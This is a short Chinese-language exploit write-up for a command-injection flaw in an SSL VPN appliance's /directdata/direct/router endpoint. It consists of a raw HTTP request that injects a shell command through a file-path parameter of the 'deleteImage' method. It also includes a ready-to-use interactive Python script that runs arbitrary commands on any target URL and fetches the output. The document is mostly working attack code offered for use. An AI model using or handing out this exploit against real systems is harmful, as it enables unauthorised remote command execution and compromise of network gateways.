自行搭建环境

image

漏洞路径:

/directdata/direct/router

数据包:

1
2
3
4
5
6
7
POST /directdata/direct/router HTTP/1.1
Host: 192.168.1.86
Connection: close
Content-Length: 160
Upgrade-Insecure-Requests: 1

{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;id >/var/www/html/test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

执行命令:

image

查看结果

image

懒人:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import requests
requests.packages.urllib3.disable_warnings()

# proxy = {'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}
def cmd(urllist,cmdsr):
url = urllist+'/directdata/direct/router'
data = {"action": "SSLVPN_Resource", "data": [{"data": ["/var/www/html/d.txt;%s >/var/www/html/test.txt" % cmdsr]}], "f8839p7rqtj": "=", "method": "deleteImage", "tid": 17, "type": "rpc"}
cmdlist = requests.post(url=url,json=data,verify=False)
urlshow = urllist+'/test.txt'
cmdshow = requests.get(url=urlshow,verify=False)
cmdshowlist = cmdshow.text
if len(cmdshowlist) == 0:
print('未读取到执行结果请检查命令是否正确,或不存在漏洞')
print('------------------------------执行结果----------------------------------\n')
print(cmdshow.text)
print('------------------------------------------------------------------------\n')
jhlist = input('输入下条需要执行的命令--退出输入T:')
if jhlist == 'T':
pass
else:
cmd(urllist,jhlist)

if __name__ == '__main__':
print('------------------------------------------------------------------------\n')
url = input('请输入url-格式为:https://xx.xx.xx.xx: ')
print('------------------------------------------------------------------------\n')
cmdsr = input('输入需要执行的命令:')
print('------------------------------------------------------------------------\n')
cmd(url,cmdsr)

image